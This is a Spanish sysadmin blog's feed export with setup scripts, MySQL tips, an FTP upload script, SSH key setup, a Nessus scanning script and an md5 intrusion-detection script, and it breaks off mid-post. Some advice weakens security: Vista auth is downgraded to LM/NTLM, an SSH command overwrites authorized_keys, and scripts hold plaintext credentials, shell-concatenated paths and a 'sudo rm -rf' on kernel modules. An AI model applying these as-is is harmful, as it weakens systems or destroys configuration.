tag:blogger.com,1999:blog-293622632011-11-28T01:04:52.578+01:00desarrollo, sistemas y seguridadBlog dedicado a la programación, seguridad y sistemas informáticos en general y todo lo referente al Open Source y GNU/Linux en particular.skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.comBlogger231100tag:blogger.com,1999:blog-29362263.post-62457890944990310532010-12-28T00:29:00.003+01:002010-12-28T00:35:37.231+01:00Lanzamiento de OpenDomo Services<span id="result_box" class="long_text" lang="es"><span title="Haz clic para obtener traducciones alternativas" class="hps"></span> <span title="Haz clic para obtener traducciones alternativas" class="hps">Opendomo</span> Services</span><span id="result_box" class="long_text" lang="es"> <span title="Haz clic para obtener traducciones alternativas" class="hps">fue</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">fundada</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">con la</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">intención</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">de</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">eliminar</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">las</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">causas</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">que</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">impiden</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">la</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">propagación</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">de la</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">automatización de viviendas e industrial</span><span title="Haz clic para obtener traducciones alternativas">, con el fin de obtener un</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">precio</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">justo</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">para todos los bolsillos</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">de u</span><span title="Haz clic para obtener traducciones alternativas" class="hps">na forma</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">totalmente</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">abierta</span><span title="Haz clic para obtener traducciones alternativas">, flexible</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">y</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">personalizable</span><span title="Haz clic para obtener traducciones alternativas">.</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">Para</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">lograrlo, los productos</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">OpenDomo</span> </span><span id="result_box" class="long_text" lang="es">Services</span><span id="result_box" class="long_text" lang="es"></span><span id="result_box" class="long_text" lang="es"><span title="Haz clic para obtener traducciones alternativas" class="hps"> se</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">basan</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">en la tecnología</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">abierta</span><span title="Haz clic para obtener traducciones alternativas">,</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">el</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">resultado de</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">la colaboración</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">con la</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">comunidad</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">OpenDomo.org</span><span title="Haz clic para obtener traducciones alternativas">,</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">lo que favorece</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">su compatibilidad con</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">muchos de los dispositivos</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">en</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">el</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">mercado</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">y la</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">mejora</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">continuidad de sus productos</span><span title="Haz clic para obtener traducciones alternativas">.</span><br /><br /><span title="Haz clic para obtener traducciones alternativas" class="hps">La</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">tecnología</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">basada en</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">la automatización</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">de productos</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">OpenDomo</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">es una</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">manera fácil</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">de poder</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">interactuar</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">con la</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">casa,</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">conseguir</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">comodidad, seguridad y</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">eficiencia a través de</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">cualquier dispositivo con</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">un</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">navegador</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">web o</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">incluso</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">a través de</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">la</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">televisión</span><span title="Haz clic para obtener traducciones alternativas">.</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">También es</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">el único</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">que</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">nació</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">con</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">la</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">vocación de</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">llegar a todo el mundo</span><span title="Haz clic para obtener traducciones alternativas">, convirtiendo</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">su</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">casa en un</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">hogar inteligente capaz de</span><span title="Haz clic para obtener traducciones alternativas" class="hps"></span> <span title="Haz clic para obtener traducciones alternativas" class="hps">aprender</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">de sus</span> <span title="Haz clic para obtener traducciones alternativas" class="hps">costumbres</span><span class="" title="Haz clic para obtener traducciones alternativas">.</span></span><p style="text-align: justify;">Más información en <a href="http://www.opendomo.com">OpenDomo.com</a><br /><span style="font-size:small;"></span></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-6245789094499031053?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com0tag:blogger.com,1999:blog-29362263.post-58336440445529681622009-09-06T19:43:00.009+02:002009-09-06T20:25:13.850+02:00Ubuntu 9.04 (Jaunty) en Macbook Pro 5,5Tras la reciente compra de mi último portátil, un Macbook Pro 5,5, he podido comprobar que Ubuntu 9.04 (Jaunty) no se acopla a la perfección, como si bien hace con muchos otros, con este sistema en particular. Tras varias reinstalaciones, me he hecho un script que recopila todos los pasos necesarios que he ido recogiendo en foros para resolver todos los problemas e incompatibilidades de una sola tajada.<br /><br /><br />Estos problemas detectados en mi Macbook Pro (5,5) son:<br /><br />- Activar sonido<br />- Configurar Tarjeta gráfica<br />- Activar backlight del teclado<br />- Remapeo de las teclas de función<br />- Configuración del touchpad<br />- Activar el led del bloqueo de mayúsculas<br /><br /><span style="font-weight: bold;">Este es el script, no olvidarse de copiar el fichero el contenido del fichero </span><span style="font-style: italic; font-weight: bold;">11-x11-synaptics.fdi </span><span style="font-weight: bold;">(que se encuentra más abajo) al mismo nivel que este script:</span><br /><span style="font-style: italic;"><br /># WARNING: Use at your own risk, only tested on a Macbook pro 5,5 with<br /># Ubuntu 9.04 (Jaunty)<br /><br /># Mactel sources<br />echo "deb http://ppa.launchpad.net/mactel-support/ubuntu jaunty main<br />deb-src http://ppa.launchpad.net/mactel-support/ubuntu jaunty main" > mactel<br />sudo mv mactel /etc/apt/sources.list.d/mactel.list<br />sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com 7A6BC20C4FE04DADD10837608DB7F87A2B97B7B8<br /># Update & upgrade<br />sudo apt-get update<br />sudo apt-get upgrade<br /><br /># Download needed packages<br />sudo apt-get -y install mbp-nvidia-bl-dkms applesmc-dkms hal-applesmc bcm5974-dkms pommed nvidia-bl-dkms sensors-applet nvidia-180-kernel-source nvidia-glx-180<br /><br /># Load needed modules<br />sudo echo "<br />coretemp<br />applesmc<br />bcm5974<br />usbhid<br />nvidia_bl shift=2<br />" >> /etc/modules<br /><br />sudo echo "blacklist usbhid" >> /etc/modprobe.d/blacklist.conf<br /><br /># Backlight<br />sudo echo "options hid_apple fnmode=2" > /etc/modprobe.d/hid_apple.conf<br /><br /># Key remaping<br />sudo echo -n "options hid pb_fnmode=2" > /etc/modprobe.d/function.conf<br /><br />sudo update-initramfs -u<br /><br /># Sound (mind to unmute the Front Speaker channel!)<br />sudo rm -rf /lib/modules/`uname -r`/kernel/sound<br />sudo aptitude reinstall linux-headers-`uname -r` linux-image-`uname -r` linux-restricted-modules-`uname -r`<br />wget ftp://ftp.kernel.org/pub/linux/kernel/people/tiwai/snapshot/alsa-driver-unstable-snapshot.tar.gz<br />tar xf alsa-driver-unstable-snapshot.tar.gz<br />cd alsa-driver-unstable<br />sudo ./configure --enable-dynamic-minors --without-oss --with-cards="hda-intel"<br />sudo make<br />sudo make install<br /><br /># Touchpad (copy the </span><span style="font-style: italic;">11-x11-synaptics.fdi file at the same level)</span><br /><span style="font-style: italic;">sudo cp ./11-x11-synaptics.fdi /etc/hal/fdi/policy/<br /><br /># To enable Caps Lock led<br />sudo aptitude remove mouseemu<br /><br /></span><span style="font-weight: bold;">Contenido de 11-x11-synaptics.fdi</span>:<br /><br /><code><span style="font-style: italic;"><span style="font-family: Georgia,serif;"><code><br /><?xml version="1.0" encoding="ISO-8859-1"?><br /><br /><deviceinfo version="0.2"><br /><br />  <device><br /><br />    <match key="info.capabilities" contains="input.touchpad"><br /><br />      <match key="info.product" contains="Synaptics TouchPad"><br /><br />        <merge key="input.x11_driver" type="string">synaptics</merge><br /><br />        <!-- Arbitrary options can be passed to the driver using <br /><br />             the input.x11_options property since xorg-server-1.5. --><br /><br />        <!-- EXAMPLE:<br /><br />        <merge key="input.x11_options.LeftEdge" type="string">120</merge><br /><br />        --><br /><br />      </match><br /><br />      <match key="info.product" contains="AlpsPS/2 ALPS"><br /><br />        <merge key="input.x11_driver" type="string">synaptics</merge><br /><br />      </match><br /><br />      <match key="info.product" contains="appletouch"><br /><br />        <merge key="input.x11_driver" type="string">synaptics</merge><br /><br />      </match><br /><br />      <match key="info.product" contains="bcm5974"><br /><br />        <merge key="input.x11_driver" type="string">synaptics</merge><br /><br />        <merge key="input.x11_options.LeftEdge" type="string">0</merge><br /><br />        <merge key="input.x11_options.RightEdge" type="string">1280</merge><br /><br />        <merge key="input.x11_options.TopEdge" type="string">0</merge><br /><br />        <merge key="input.x11_options.BottomEdge" type="string">800</merge><br /><br />        <merge key="input.x11_options.ClickFinger1" type="string">1</merge><br /><br />        <merge key="input.x11_options.ClickFinger2" type="string">3</merge><br /><br />        <merge key="input.x11_options.ClickFinger3" type="string">2</merge><br /><br />        <merge key="input.x11_options.HorizEdgeScroll" type="string">0</merge><br /><br />        <merge key="input.x11_options.VertEdgeScroll" type="string">0</merge><br /><br />        <merge key="input.x11_options.VertTwoFingerScroll" type="string">1</merge><br /><br />        <merge key="input.x11_options.HorizTwoFingerScroll" type="string">1</merge><br /><br />        <merge key="input.x11_options.HorizScrollDelta" type="string">0</merge><br /><br />        <merge key="input.x11_options.VertScrollDelta" type="string">40</merge><br /><br />        <merge key="input.x11_options.PressureMotionMinZ" type="string">10</merge><br /><br />        <merge key="input.x11_options.FingerLow" type="string">16</merge><br /><br />        <merge key="input.x11_options.FingerHigh" type="string">80</merge><br /><br />        <merge key="input.x11_options.FingerPress" type="string">256</merge><br /><br />        <merge key="input.x11_options.PalmDetect" type="string">1</merge><br /><br />        <merge key="input.x11_options.PalmMinWidth" type="string">10</merge><br /><br />        <merge key="input.x11_options.PalmMinZ" type="string">200</merge><br /><br />        <merge key="input.x11_options.MinSpeed" type="string">0.8</merge><br /><br />        <merge key="input.x11_options.MaxSpeed" type="string">1.2</merge><br /><br />        <merge key="input.x11_options.AccelFactor" type="string">0.10</merge><br /><br />        <merge key="input.x11_options.MaxTapMove" type="string">25</merge><br /><br />        <merge key="input.x11_options.MaxTapTime" type="string">223</merge><br /><br />        <merge key="input.x11_options.MaxDoubleTapTime" type="string">200</merge><br /><br />        <merge key="input.x11_options.TapButton1" type="string">1</merge><br /><br />        <merge key="input.x11_options.TapButton2" type="string">3</merge><br /><br />        <merge key="input.x11_options.TapButton3" type="string">2</merge><br /><br />        <merge key="input.x11_options.RTCornerButton" type="string">0</merge><br /><br />        <merge key="input.x11_options.RBCornerButton" type="string">0</merge><br /><br />        <merge key="input.x11_options.LTCornerButton" type="string">0</merge><br /><br />        <merge key="input.x11_options.LBCornerButton" type="string">0</merge><br /><br />      </match><br /><br />    </match><br /><br />  </device><br /><br /></deviceinfo><br /><br /><br /></code><br /></span></span></code><br /><span style="font-style: italic;"></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-5833644044552968162?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com2tag:blogger.com,1999:blog-29362263.post-24921418916438683022008-10-30T02:04:00.004+01:002008-10-30T02:29:03.164+01:00Domótica OpenSource = OpenDomoDesde hace unos meses estamos trabajando en un proyecto totalmente OpenSource cuyo objetivo es el de proporcionar una solución libre de domótica. Desde aquí os quiero animar a que lo probéis y, si tenéis algo de tiempo, colaborar en lo que sea. El sistema se basa en una distro completamente hecha desde 0 la cuál está pensada para correr en sistemas muy pequeños. El software está escrito en C y shell script. Si queréis más información podéis visitar la página del proyecto: <a href="http://www.opendomo.org">www.opendomo.org</a> y en Google Code: <a href="http://code.google.com/p/opendomo">http://code.google.com/p/opendomo</a><br /><br />Os paso la introducción del proyecto para que os hagáis una idea:<br /><br />El proyecto OpenDomo se inició en 2006 con el objetivo de crear un sistema de control domótico libre que cubriese las necesidades de un hogar del futuro. Actualmente el proyecto OpenDomo se encuentra todavía en una fase inicial de desarrollo, aunque sus funcionalidades y su estabilidad aumentan cada día.<br /><br /> <br /><br />¿Qué es OpenDomo?<br /><br />OpenDomo es un sistema de control domótico y seguridad pensado para ofrecer una alternativa libre al hogar del futuro. La licencia bajo la que se está desarrollando el proyecto es la Licencia Pública General (GPL.) . Ésta, garantiza la libertad en el uso del software, uno de los principales valores de la sociedad tecnológica actual. En términos generales, esto implica que OpenDomo puede ser usado, copiado, modificado y distribuido libremente.<br /><br /> <br /><br />Objetivos del proyecto<br /><br />OpenDomo surge ante la necesidad de disponer de un software avanzado de domótica, que permita un control total del hogar, integrando hardware de fabricantes diferentes. Por lo que el objetivo principal consiste en disponer de un sistema que permita manipular desde un punto central cualquier elemento susceptible de ser controlado electrónicamente. Por ejemplo, todo tipo de sensores, el sistema de alarma, el circuito cerrado de TV, el sistema multimedia (audio, vídeo, TV, ...), las luces, las persianas, el horno, etc.<br /><br />Una de las formas más extendidas de aplicar la domótica consiste en el uso de hardware especializado. Algunos fabricantes han desarrollado hardware que usa protocolos propios y cerrados, lo que impide la ampliación o mejora de estos productos por terceras partes. Otros, han desarrollado hardware que usa protocolos abiertos ampliamente usados, como KNX/EIB o X10, pero muy limitados.<br /><br />OpenDomo intenta salir del esquema basado en hardware y protocolos desfasados que no permiten cumplir con las necesidades del hogar actual. De esta manera, se implementa una red domótica basada en TCP/IP y en hardware estándard. TCP/IP es un conjunto de protocolos de amplio uso que forman Internet y que permiten el uso de todo tipo de tecnologías de actualidad, como streaming de audio/video, telefonía IP, compartición de archivos o televisión p2p, etc.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-2492141891643868302?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com2tag:blogger.com,1999:blog-29362263.post-461806096701847022008-02-20T00:58:00.005+01:002008-10-30T02:30:36.524+01:00MySql :: Tips de OptimizaciónHola,<br /><br />Estas son unas recomendaciones básicas para mejorar el rendimiento de MySQL y que se hacen vitales cuando tratamos con grandes cantidades de información:<br /><br />1) Evitar utilizar el tipo de dato BIGINT y utilizar en su lugar INT. Para conocer el tipo de dato recomendado por MySql podemos utilizar la siguiente consulta:<br /><br />SELECT id_comercio FROM bbdd.comercios PROCEDURE ANALYSE()\G<br /><br />La cual nos devuelve el tipo de dato óptimo en el campo "Optimal_fieldtype".<br /><br />2) Es importante evitar que los tipos de dato numéricos se traten como "Strings" en las sentencias.<br />Por ejemplo:<br /><br />- Incorrecto: SELECT COUNT(*) FROM bbdd.pedidos WHERE id_pedido='10';<br /><br />- Correcto: SELECT COUNT(*) FROM bbdd.pedidos WHERE id_pedido = 10;<br /><br />- Incorrecto: INSERT INTO tabla_x VALUES ('94','1','99');<br /><br />- Correcto: INSERT INTO tabla_x VALUES (94, 1, 99);<br /><br />Puede parecer bastante insignificante pero cuando hablamos de millares de consultas o más, estamos obligando al servidor MySql a hacer un CAST de String a Entero por consulta lo cual, nos lo podemos ahorrar.<br /><br />3) NO crear índices si el valor que vamos a guardar tiene menos de 20 posibles variantes.<br />Ejemplos:<br /><br />- NO crear índices en campos del tipo 0/1 o boleanos.<br />- NO crear índices en campos cuyo calor sea un rango de números del 1 al 10.<br /><br />4) Es muy aconsejable utilizar la sentencia EXPLAIN en todas las consultas para saber si estamos utilizando correctamente los índices o en caso contrario, el servidor está haciendo un "table scan". Es importante saber que aunque especifiquemos índices en la cláusula WHERE, MySql no tiene por qué utilizarlos si no lo ve conveniente.<br /><br />5) No utilizar funciones de tipo NOW o CURDATE ya que las consultas que las utilizan NO las guardan en CACHE.<br /><br />6) Si se realizan cargas de datos en tablas, es mejor utilizar Inserts múltiples: INSERT INTO bbdd.tabla (campo1,campo2) VALUES (1,2),(3,2),(3,6).<br /><br />Ejemplo en PHP:<br /><br />...<br />$sQuery = "SELECT campo1, campo2 FROM tabla";<br />$iIdQuery = mysql_query($sQuery, $iIdConn);<br /><br />foreach(mysql_fetch_row($iIdQuery) as $aValue)<br />{<br /> $aValues[] = "(".$aValue['campo1'].",".$aValue['campo2'].")";<br />}<br />$sQueryInsert = "INSERT INTO tabla2 (campo1, campo2) VALUES ". implode(",",$aValues);<br /><br />mysql_query($sQueryInsert,$iIdConn);<br />...<br /><br />Espero que os sean de utilidad. En cuanto recopile otra lista volveré a postearlos.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-46180609670184702?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com0tag:blogger.com,1999:blog-29362263.post-30463137820191461792008-02-17T00:15:00.006+01:002008-10-30T02:31:46.440+01:00Python :: Subir Ficheros a FTPHola,<br /><br />Después de tantos meses, publico un pequeño script que me es muy útil: Sube automáticamente los ficheros modificados al FTP que le especifiquéis. Que conste que soy un novato en Python! Ahí va:<br /><br />--------------------------------------------------------<br />#!/usr/bin/env python<br /># coding: iso-8859-15<br /><br />import os<br />import sys<br />import ftplib<br /><br /># Configuración<br /><br />project_path = "/path/to/project"<br />ftp_project_path = "/public_html"<br />ftpsite = "ftp.site.com"<br />ftpusr = "ftpuser"<br />ftppass = "ftppassword"<br />mnmin = 120<br />file_types = "[php|htm|html|js]"<br /><br /># Funciones<br /><br />def upload(conn, fname):<br /> global ftp_project_path, project_path, path_len<br /><br /> dir_len = len(fname)<br /> file2stor = fname[path_len:]<br /> (dir, tail) = os.path.split(file2stor)<br /> dir2stor = ftp_project_path+dir<br /> command = "STOR " + tail<br /><br /> conn.cwd(dir2stor)<br /> print "Almacenando en: "+dir2stor<br /><br /> fd = open(fname, 'rb')<br /> temp = fd.read(2048)<br /> fd.seek(0, 0)<br /> if temp.find('\0') != -1:<br /> conn.storbinary(command, fd)<br /> else:<br /> conn.storlines(command, fd)<br /> fd.close()<br /><br />def connect(site,usr,pwd):<br /> conn = ftplib.FTP(site)<br /> conn.login(user=usr, passwd=pwd)<br /> return conn<br /><br /># Inicio del script<br /><br />conn = connect(ftpsite,ftpusr,ftppass)<br />path_len = len(project_path)<br /><br />for file in os.popen("/usr/bin/find "+project_path+" -type f -regex '.*."+file_types+"' -mmin -"+str(mnmin)).readlines():<br /> file = file.strip()<br /> print "Subiendo online el fichero ["+file+"]"<br /> upload(conn,file)<br /><br />--------------------------------------------------------<br /><br />Espero que os sea útil. Básicamente sube al directorio del FTP que le especifiquéis los ficheros modificados con la extensión <span style="font-style: italic;">file_types</span> en las últimas 2 horas.<br /><br />A10!<br /><br />PD: Tener en cuenta que python utiliza la identación para englobar las funciones, bucles, condicionales, etc... y que el blogger este se come las tabulaciones!<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-3046313782019146179?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com1tag:blogger.com,1999:blog-29362263.post-26519537284595541022007-03-08T15:57:00.000+01:002007-03-08T16:00:59.759+01:00Anillo de confianza SSHSi estáis hartos de introducir la contraseña cada vez que accedéis a un servidor mediante ssh,<br />podéis evitarlo siguiendo estos sencillos pasos para crear un anillo de confianza en ssh.<br /><br />1 - Generar la clave pública, que identificará a nuestro equipo y usuario. Esto se hace mediante el siguiente comando:<br /><br /><span style="font-weight: bold;">skarvin@skarvin-desktop:~>ssh-keygen -t rsa</span><br /><br />*No hace falta responder a las preguntas.<br /><br />2 - Importar la clave en el equipo donde queramos conectarnos.<br /><br /><span style="font-weight: bold;">skarvin@skarvin-desktop:~>scp .ssh/id_rsa.pub skarvin@server:.</span><br /><br />3 - Añadir la clave en el fichero authorized_keys<br />Si no existe, crearemos el fichero .ssh/authorized_keys en vuestra home mediante:<br /><br /><span style="font-weight: bold;">skarvin@server:~>touch .ssh/authorized_keys</span><br /><br />y a continuación añadiremos al fichero nuestra clave pública creada anteriormente:<br /><br /><span style="font-weight: bold;">skarvin@server:~>cat id_rsa.pub > .ssh/authorized_keys</span><br /><br />Eso es todo!<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-2651953728459554102?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com0tag:blogger.com,1999:blog-29362263.post-1169754140108745962007-01-25T20:42:00.000+01:002007-01-25T20:43:15.376+01:00Windows Vista & SambaPara poder autenticar un cliente Windows Vista contra un servidor Samba necesitamos cambiar la configuración del cliente Vista que por defecto, no nos deja acceder a recursos compartidos por un servidor Unix/Samba. Los pasos son los siguientes:<br /><br />Ir a: <br />Inicio -> Ejecutar -> secpol.msc<br /><br />Nos aparecerá la siguiente pantalla:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://photos1.blogger.com/x/blogger/5691/3125/1600/818088/1.jpg"><img style="cursor:pointer; cursor:hand;" src="http://photos1.blogger.com/x/blogger/5691/3125/320/999940/1.jpg" border="0" alt="" /></a><br /><br /><br />A continuación seleccionaremos: <span style="font-weight:bold;">Network Security: LAN Manager authentication level</span> y cambiaremos el valor por defecto: <span style="font-style:italic;">Send NTLMv2 response only</span> por <span style="font-style:italic;">Send LM & NTLM - use NTLMv2 session security if negotiated</span>. <br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://photos1.blogger.com/x/blogger/5691/3125/1600/206735/2.jpg"><img style="cursor:pointer; cursor:hand;" src="http://photos1.blogger.com/x/blogger/5691/3125/320/300787/2.jpg" border="0" alt="" /></a><br /><br />Samba no implementa NTLMv2 por lo tanto deberemos usarlo solo si se produce la negociación.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-116975414010874596?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com10tag:blogger.com,1999:blog-29362263.post-1166048315205559232006-12-13T23:17:00.000+01:002006-12-13T23:18:35.880+01:00Be a pointer my friend<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://photos1.blogger.com/x/blogger/5691/3125/1600/376546/dennis_ritchie.jpg"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://photos1.blogger.com/x/blogger/5691/3125/320/856241/dennis_ritchie.jpg" border="0" alt="" /></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-116604831520555923?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com3tag:blogger.com,1999:blog-29362263.post-1152169899621052672006-07-06T09:10:00.001+02:002008-10-30T02:34:25.328+01:00Linux :: Análisis de vulnerabilidadesEste script en perl, permite realizar un análisis de vulnerabilidades de nuestra subred y posteriormente envía un e-mail con el reporte de vulnerabilidades como adjunto. Es útil si queremos tener un sistema de Análisis de Vulnerabilidades programado para que se ejecute cada cierto tiempo. Tan solo hay que ajustar los parámetros de configuración y listo.<br /><br />--------------------------------------------------------<br />#!/usr/bin/perl<br /><br />use MIME::Lite;<br /><br /># DATOS DE CONEXION<br />$NESSUS_SERVER = "127.0.0.1";<br />$NESSUS_PORT = 1241;<br />$USER = "skarvin";<br />$PASS = "password";<br /><br /># RUTA NESSUS<br />$NESSUS = "/usr/local/bin/nessus";<br /><br /># RUTA FICHERO DE HOSTS A ANALIZAR<br />$HOSTS = "targets.txt";<br /><br /># Formatos del fichero de salida<br /># nbe, html, html_graph, text, xml, old-xml, tex, nsr<br />$FORMAT = "html";<br /><br /># Ruta fichero de resultados<br />$RESULTS = "results.html";<br /><br />system( "$NESSUS -q -T $FORMAT $NESSUS_SERVER $NESSUS_PORT" .<br /> "-x $USER $PASS $HOSTS $RESULTS");<br /><br /># Envio de correo con reporte de vulnerabilidades en formato HTML<br /><br />$msg = MIME::Lite->new(<br />From =>'mantenimiento@empresa.es',<br />To =>'informatica@empresa.es',<br />Subject =>'Informe de vulnerabilidades',<br />Type =>'multipart/mixed'<br />);<br /><br />$msg->attach(<br />Type =>'TEXT',<br />Data =>"Informe de vulnerabilidades de Empresa"<br />);<br /><br />$msg->attach(<br />Type =>'text/html',<br />Path =>"$RESULTS",<br />Filename =>"$RESULTS",<br />Disposition => 'attachment'<br />);<br /><br />$msg->send('smtp', 'mail.empresa.es');<br /><br />open CMD, "rm -f $RESULTS";<br /><br />--------------------------------------------------------<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-115216989962105267?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com4tag:blogger.com,1999:blog-29362263.post-1151674974506097232006-06-30T15:39:00.002+02:002008-02-20T01:00:53.149+01:00HIDS :: Detección de intrusos simpleA continuación se proponen 2 simples scripts para poder controlar las modificaciones en el sistema de ficheros de nuestro sistema.<br /><br />El primero nos hace un hash MD5 de cada fichero de los directorios que le especificamos, el script es el siguiente:<br /><br /><table class="MsoTableGrid" style="border: medium none ; background: rgb(224, 224, 224) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; border-collapse: collapse; width: 447px; height: 398px;" border="1" cellpadding="0" cellspacing="0"> <tbody><tr style=""> <td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 432.2pt;" valign="top" width="576"> <p class="MsoNormal"><span style="" lang="EN-GB"><br /></span></p><p class="MsoNormal"><span style="" lang="EN-GB">#!/bin/bash<br />date<br />md5sum_dir() {<br />for file in `find $1`; do<br />if test -f $file<br />then<br />md5sum $file<br />fi<br />done<br />}<br />md5sum_dir "/bin"<br />md5sum_dir "/etc"<br />md5sum_dir "/sbin"<br />md5sum_dir "/usr/bin"<br />md5sum_dir "/usr/sbin"<br />md5sum_dir "/usr/etc"<br />md5sum_dir "/boot"<br />md5sum_dir "/var/www"<br />md5sum_dir "/lib"<br />md5sum_dir "/usr/lib"<br />md5sum_dir "/usr/local/bin"<br />date</span></p><p class="MsoNormal"><br /><span style="" lang="EN-GB"><o:p></o:p></span></p> </td> </tr> </tbody></table><br />Guardaremos el script en <span style="" lang="EN-GB">/usr/local/bin/integridad.sh y le daremos permisos de ejecución mediante: <span style="font-style: italic;">chmod +x </span></span><span style="font-style: italic;" lang="EN-GB">/usr/local/bin/integridad.sh</span><br /><br /><br />NOTA: Una herramienta alternativa a este script es la proporcionada por The Coroner's Toolkit en la cual se puede reducir a esto:<br /># md5deep -r /bin /var/ww /etc > linux.md5<br /><br /><br /><br />El segundo hará uso del primer script para obtener el hash de los ficheros y guardarlos en un fichero, <span style="font-weight: bold;">comparará el fichero del día actual, con el del día anterior</span> y enviará por correo electrónico las diferencias .<br /><br />NOTA: Este script es una modificación del comentado <a 